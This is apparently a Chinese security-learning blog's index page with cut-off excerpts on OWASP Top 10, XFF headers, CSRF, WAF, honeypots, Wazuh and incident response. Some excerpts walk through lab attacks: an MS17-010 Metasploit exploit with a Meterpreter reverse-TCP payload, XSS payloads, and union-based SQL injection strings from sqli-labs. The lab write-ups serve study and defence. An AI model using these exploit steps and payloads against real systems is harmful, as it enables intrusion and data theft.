hvv(一)
知道OWASP TOP 10吗?OWASP(Open Web Application Security Project)是一个国际性的非营利组织,致力于改善Web应用程序的安全性和保护网络世界的安全
注入漏洞 常见的就是sql注入,还有os命令、orm等
失效的身份认证 攻击者利用网络应用程序中的身份认证缺陷获取高权限并进行攻击应用服务
敏感数据泄露 常见的攻击方式主要是扫描应用程序获取敏感数据
xml外部实体漏洞 当应用程序解析xml文件时包含了对外部实体的引用,攻击者传递恶意包含xml代码的文件,读取指定的服务器资源
无效的访问控制 没有检查身份,直接导致攻击者绕过权限直接访问
安全配置错误 攻击者利用错误配置攻击,获取敏感数据或提升权限
跨站脚本攻击(xss) 攻击者使用恶意字符嵌入应用程序代码中并运行
不安全的反序列化漏洞 攻击者利用应用程序反序列化功能,反序列化恶意对象攻击应用程序
使用含有已知漏洞的组件 利用应用程序技术栈中的框架、库、工具等的已知漏洞进行攻击,获取高权限或者敏感数据
日志记录和监控不足导致的风险 对于日志记录的监控不足,造成攻击者攻击 ...
渗透测试-信息收集
信息收集的定位
什么是被动信息收集
java盛华外卖(一)
技术选型
配置属性类将application.yml中的属性配置封装成一个对象
1234567891011121314151617181920212223242526package com.sky.properties; import lombok.Data; import org.springframework.boot.context.properties.ConfigurationProperties; import org.springframework.stereotype.Component; @Component @ConfigurationProperties(prefix = "sky.jwt") @Data public class JwtProperties { /** * 管理端员工生成jwt令牌相关配置 */ private String adminSecretKey; private long adminTtl; private String adminTokenNam ...
安全术语
xffX-Forwarded-For(XFF)是一个HTTP请求头字段,用于指示请求经过了代理服务器。它用于在多层代理或负载均衡环境中识别真实客户端的IP地址。攻击者可能会利用XFF头字段来隐藏其真实的来源IP地址,以进行匿名攻击、IP欺骗或绕过一些安全措施。
在应用程序或网络防御中,了解和分析XFF头字段可以帮助识别可能的攻击来源。通过查看XFF头字段中列出的代理IP地址,可以追踪请求的路径,以确定真实的客户端IP地址。这有助于进行安全审计、攻击溯源和防御措施的制定。然而,需要注意的是,XFF头字段可以被攻击者伪造或篡改,因此在使用XFF头字段进行安全分析时需谨慎对待,并结合其他安全日志和技术进行综合分析。
ms17-010漏洞复现
攻击机:kali 2021.1
靶机:win7
进入到root权限中
1sudo su
使用nmap命令扫描192.168.186.*网段下的所有ip地址
1nmap -A -T4 -sV 192.168.186.*
使用msfconsole模块
1msfconsole
使用 命令 search ms17-010 搜索名为ms17-010的漏洞,0,1,4为利用攻击模块。2,3为辅助模块
1search ms17-010
先使用命令 use 3 来使用3模块确定漏洞是否存在,然后查看信息:show options
12use 3show options
Required中为yes选项是一定要填写的而且是缺少目标主机未设置,我们需要给他添加目标主机,使用命令
1set rhost 192.168.186.131
再次查看show options
1run
发现易受ms17-010攻击
切换到攻击模块
1use 0
没有配置有效负载,配置一下
1set payload windows/x64/meterpreter/reverse_tcp
查看信息:s ...
Csrf
Csrf与xss的区别CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏 因此,网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF
因此,网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如:
对敏感信息的操作增加安全的token;
对敏感信息的操作增加安全的验证码;
对敏感信息的操作实施安全的逻辑流程,比如修改密码时,需要先校验旧密码等。
Pikachu(Get)
点击提交,用burpsuite抓包
1234567891011121314GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=13789567458&add=usa&email=lucy%40pikachu.com&submit=submit HTTP/1.1Host: 127.0.0.1User-Agent: Mozi ...
xss-labs
level1源码
test的值是url name参数直接传进来的
1name=<script>alert()</script>
level2源码
test的值也是用keyword参数直接插入进去,试试在url构造payload
1keyword=<script>alert()</script>
显示以下东西
查看源码
第一个插入被转义了,但是第二个没有,因此对第二个构造payload
1"> <script>alert()</script> <"
level3插入
1<script>alert()</script>
两个都被转义
源码
1234567891011121314151617181920212223<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=u ...
sqli-labs
第一关(单引号字符型注入)判断是否存在sql注入1?id=1
显示正常
1?id=1'
报错
说明存在sql注入
判断字符型还是数字型1?id=1'--+
显示正常,说明是字符型
如果是数字型,则要报错;字符型的话,对应的sql语句是select * from user where id=’1’–+’
–+将后面的’注释掉了
由于它有回显,所以可使用联合查询
判断有多少字段
select * from user where id = ‘1’ order by 3 –+’
如果是3正常,如果是4则不正常,说明有3个字段;字段就是列数
1?id=1' order by 3 --+
爆出显示位
页面显示的信息是数据库中哪一列显示的
1?id=-1' union select 1,2,3--+
以上说明是,第2、3列显示
获取当前数据名和版本号1?id=-1' union select 1,database(),version()--+
获取账号、密码
group_concat()是将查询到结果连接起来。如果不用group_concat查询到的只有user。该语句的 ...
护网-基础防御
WAF防护原理
WAF简单描述,就是解析HTTP请求(协议解析模块),规则检测(规则模块),做不同的防御动作(动作模块),并将防御过程(日志模块)记录下来。
配置模块
协议解析模块
规则模块
动作模块
错误处理模块
WAF处理流程
Hfish蜜罐
概念
分类
蜜罐工作原理
蜜罐技术隐藏技术
牵引技术
诱饵技术
反制技术
识别技术
协议识别技术
环境特征部分蜜罐的用户名、密码固定,或内存使用、进程占用等动态特征变化较为规律,可以通过这种方式来判断是否为蜜罐
Wazuh
支持的功能:
日志数据收集
文件完整性监控
审计who-data
异常和恶意软件检测
安全配置评估
监控安全策略
监控系统调用
命令监控
主动响应
使用wazuh
如果对部署了wazuh的机器进行爆破,则会在wazuh-dashboard中显示
文件完整性检测
linux
windows
SQL注入检测
护网-应急响应
应急响应事件分类应用安全webshell、网页篡改、网页挂马
系统安全勒索病毒、挖矿木马、远控后门
网络安全DDOS攻击、ARP攻击、流量劫持
数据安全数据泄露、损坏、加密
如何做应急响应确定攻击时间能够帮助我们缩小应急响应范围,有助于提高效率
查找攻击线索能够让我们知道攻击者做了什么事情
梳理攻击流程还原整个攻击场景
实施解决方案修复漏洞,切断攻击途径
定位攻击者溯源取证
应急响应模型(PDCERF)准备阶段(Preparation)
应用团队建设
应急方案制定
渗透测试评估
安全基线检查
检测阶段(Detection)
判断事件类型
判断事件级别
确定应急方案
抑制阶段(Containment)
限制攻击/破环波及的范围,同时也是在降低潜在的损失
阻断:IP地址、网络连接、危险主机
关闭:可疑进程、可疑服务
删除:违规账号、危险文件
根除阶段(Eradication)
通过事件分析找出根源并彻底根除,以避免再次利用
增强:安全策略、全网监控
恢复:应用漏洞、系统漏洞、补丁更新
还原:操作系统、业务系统
恢复阶段(Recovery)
把被破坏的信息彻底还原到正常运行的 ...